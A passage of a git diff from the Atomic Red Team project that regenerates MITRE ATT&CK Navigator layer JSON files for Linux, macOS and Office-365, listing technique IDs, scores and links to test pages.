Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1222.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1484.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1484","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1496","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1496","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1543.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1547.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1552.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1556.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1574.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1606.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1606","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1609","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1611","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1611","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json index 8b137891..19ebb1f9 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json 
@@ -1 +1 @@ - +{"version":"4.3","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1027.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.003","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"}]},{"techniqueID":"T1056.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1110.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1132.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1222.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1496","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1496","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1543.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.014","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1547.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"}]},{"techniqueID":"T1548.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1552.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1553.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1555.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1569.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json index e69de29b..4fe1a7d0 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json @@ -0,0 +1 @@ +{"version":"4.3","name":"Atomic Red Team (Office-365)","description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View 